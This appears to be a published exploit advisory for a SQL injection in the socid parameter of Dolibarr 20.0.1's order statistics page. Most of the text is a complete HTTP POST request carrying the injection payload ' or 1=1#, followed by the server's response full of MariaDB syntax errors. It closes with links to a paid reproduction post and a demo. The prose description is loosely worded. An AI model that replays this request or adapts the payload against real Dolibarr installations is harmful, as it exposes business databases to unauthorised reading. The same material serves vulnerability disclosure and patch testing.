Dolibarr 20.0.1 SQL Injection

`## Titles: dolibarr 20.0.1 Multiple security token SQLi  
## Author: nu11secur1ty  
## Date: 10/15/2024  
## Vendor: https://www.dolibarr.org/  
## Software: https://www.dolibarr.org/downloads.php  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `socid` parameter appears to be vulnerable to SQL injection attacks.  
The attacker can get sensitive information for the MySQL database from this  
system when he attacks it online from inside!  
He can do this, by using a vulnerable security token to access the web  
application!  
  
STATUS: Medium- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```  
POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate, br  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie:  
DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q  
Origin: http://pwnedhost.com  
Upgrade-Insecure-Requests: 1  
Referer:  
http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier  
Content-Type: application/x-www-form-urlencoded  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129",  
"Chromium";v="129"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 357  
  
token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh  
```  
  
[+]Response:  
```SQLi  
HTTP/1.1 200 OK  
Date: Tue, 15 Oct 2024 10:23:43 GMT  
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4  
X-Powered-By: PHP/8.2.4  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
Referrer-Policy: same-origin  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 80974  
  
<!doctype html>  
<html lang="en">  
<head>  
<meta charset="utf-8">  
<meta name="robots" content="noindex,nofollow">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<meta name="author  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31  
23:59:59'...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31  
23:59:59'...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31  
23:59:59'...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31  
2...' at line 1<b  
...[SNIP]...  
</b> mysqli<br>  
...[SNIP]...  
</b> You have an error in your SQL syntax; check the manual that  
corresponds to your MariaDB server version for the right syntax to use near  
') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author =  
1...' at line 1<b  
```  
## Reproduce:  
[href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337)  
  
  
## Demo PoC:  
[href](  
https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html  
)  
  
## Time spent:  
05:27:00  
  
  
`